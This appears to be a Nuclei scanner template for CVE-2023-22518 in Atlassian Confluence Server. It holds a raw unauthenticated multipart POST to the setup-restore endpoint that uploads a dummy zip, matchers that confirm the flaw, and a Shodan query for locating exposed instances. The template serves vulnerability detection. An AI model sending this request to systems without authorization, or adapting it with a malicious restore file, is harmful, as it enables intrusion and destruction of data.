61 lines
2.7 KiB
YAML
61 lines
2.7 KiB
YAML
id: CVE-2023-22518
|
|
|
|
info:
|
|
name: Atlassian Confluence Server - Improper Authorization
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.
|
|
Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
|
|
reference:
|
|
- https://confluence.atlassian.com/pages/viewpage.action?pageId=1311473907
|
|
- https://blog.projectdiscovery.io/atlassian-confluence-auth-bypass/
|
|
- https://jira.atlassian.com/browse/CONFSERVER-93142
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-22518
|
|
- https://github.com/RootUp/PersonalStuff/blob/master/check_cve_2023_22518.py
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-22518
|
|
cwe-id: CWE-863
|
|
epss-score: 0.96525
|
|
epss-percentile: 0.99508
|
|
cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: atlassian
|
|
product: confluence_data_center
|
|
shodan-query: http.component:"Atlassian Confluence"
|
|
note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts.
|
|
tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /json/setup-restore.action HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7
|
|
X-Atlassian-Token: no-check
|
|
|
|
------WebKitFormBoundaryT3yekvo0rGaL9QR7
|
|
Content-Disposition: form-data; name="buildIndex"
|
|
|
|
false
|
|
------WebKitFormBoundaryT3yekvo0rGaL9QR7
|
|
Content-Disposition: form-data; name="file";filename="{{randstr}}.zip"
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundaryT3yekvo0rGaL9QR7
|
|
Content-Disposition: form-data; name="edit"
|
|
|
|
Upload and import
|
|
------WebKitFormBoundaryT3yekvo0rGaL9QR7--
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code == 200"
|
|
- "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"
|
|
condition: and
|
|
# digest: 4b0a00483046022100d500a52299fd568c1facb90f250d1709fe54f232ccbf3199a9b2f574bb940c710221009978593fe8a0447865a52f9780622afee089e3b648de5e283dfe9e12d9a94566:922c64590222798bb761d5b6d8e72950 |